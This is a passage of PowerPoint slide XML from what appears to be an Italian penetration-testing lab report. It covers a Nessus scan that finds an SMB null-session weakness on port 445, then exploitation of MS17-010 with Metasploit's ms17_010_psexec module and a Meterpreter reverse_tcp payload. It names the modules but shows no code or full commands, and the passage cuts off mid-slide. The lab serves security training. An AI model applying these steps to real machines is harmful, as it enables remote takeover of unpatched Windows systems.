                  <a:pt x="0" y="1409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7" id="27"/>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8" id="28"/>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9" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="125239" y="3306713"/>
            <a:ext cx="6301968" cy="5839754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>La scansione richiede un determinato ammontare di tempo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Una volta finita, possiamo vedere tutte le vulnerabilità trovate messe in ordine di rischio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A noi interessa la Vulnerabilità di livello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>HIGH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> chiamata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>SMB NULL Session Authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Cliccando su di essa, abbiamo una descrizione della vulnerabilità insieme alla porta dove si trova, in questo caso la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nessus fornisce anche della documentazione a riguardo, coaudivata da possibili soluzioni. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2234450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="996477" y="5057775"/>
            <a:ext cx="15381560" cy="811530"/>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3 - Fase di Exploit</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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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178559" y="7089064"/>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079560" y="4798086"/>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266465" y="-4442438"/>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013299" y="-1382117"/>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4190068" y="-1019562"/>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AutoShape 7" id="7"/>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9144000" y="2748867"/>
            <a:ext cx="7769323" cy="6509433"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6509433" w="7769323">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7769323" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769323" y="6509433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6509433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="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0" id="1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11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2860856"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3.1 - PANORAMICA DI METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="782093" y="3730012"/>
            <a:ext cx="6299718" cy="3948277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3928"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Arrivati a questo punto, ci avvarremo di Metasploit per sfruttare la vulnerabilità trovata.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3928"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3928"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3928"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per avviare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>in Kali Linux, basta digitare il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2806">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>sul terminale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3862988" y="-2151283"/>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173493" y="5143500"/>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081690"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165038" y="492358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17" id="17"/>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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14031535" y="-113448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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="295453" y="196351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TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2234450" y="835459"/>
            <a:ext cx="14768151" cy="634131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3.2 - SFRUTTAMENTO VULN MS17-010</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4016966">
            <a:off x="7191481" y="92831"/>
            <a:ext cx="2971139" cy="4434535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4434535" w="2971139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2971139" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2971139" y="4434536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4434536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10632967" y="2569721"/>
            <a:ext cx="5002960" cy="6688579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6688579" w="5002960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5002961" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5002961" y="6688579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6688579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-123227" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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6" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="295453" y="3005988"/>
            <a:ext cx="6418719" cy="5787471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Come prima cosa andiamo a cercare l’exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>MS17-010 come richiesto dalla traccia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Che cos’è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>MS17-010?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>È il decimo Microsoft Bullettin pubblictao nel 2017. Microsoft Security Bulletin, è una comunicazione periodica pubblicata da Microsoft che contiene informazioni su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>vulnerabilità di sicurezz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, aggiornamenti e patch relative ai loro prodotti software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Da notare che in MS17-010,  è presente il famoso exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eternal Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, un exploit sviluppato dalla NSA e divulgato dal gruppo hacker Shadow Brokers nel 2017. Sfrutta una vulnerabilità nel protocollo SMB di Windows, consentendo la diffusione di malware come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, causando danni su scala globale. Non useremo Eternal  Blue perché è efficace solo su sitemi a 64bit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per Windows XP, dovremmo usare l’exploit 10, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ms17_010_psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, noto anche come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eternal Romance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1736">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2431"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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3862988" y="-2151283"/>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173493" y="5143500"/>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081690"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165038" y="492358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17" id="17"/>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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14031535" y="-113448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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="295453" y="196351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TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2234450" y="835459"/>
            <a:ext cx="14768151" cy="634131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3.2 - SFRUTTAMENTO VULN MS17-010</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7889113" y="5513410"/>
            <a:ext cx="10232330" cy="3366005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3366005" w="10232330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10232330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10232330" y="3366006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3366006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-3356" r="-1472" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5116361">
            <a:off x="6917287" y="1911865"/>
            <a:ext cx="3320030" cy="4955268"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4955268" w="3320030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3320030" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3320030" y="4955269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4955269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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6" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="264496" y="3063717"/>
            <a:ext cx="6443529" cy="5991099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2631"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Usiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>insieme al nome dell’exploit per poter iniziare la configurazione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2631"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2631"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Di default metasploit imposta come payload Meterpreter, che offre un ambiente interattivo e modulare con molteplici funzionalità avanzate per il controllo remoto, come l'esecuzione di comandi, la gestione dei file, e la cattura delle credenziali, rendendolo uno strumento estremamente versatile e potente. In questo caso abbiamo una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> ovvero un tipo di shell di comando che farà in modo di far </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>partire una connessione dalla macchina target alla macchina dell’attaccante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2631"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2631"/>
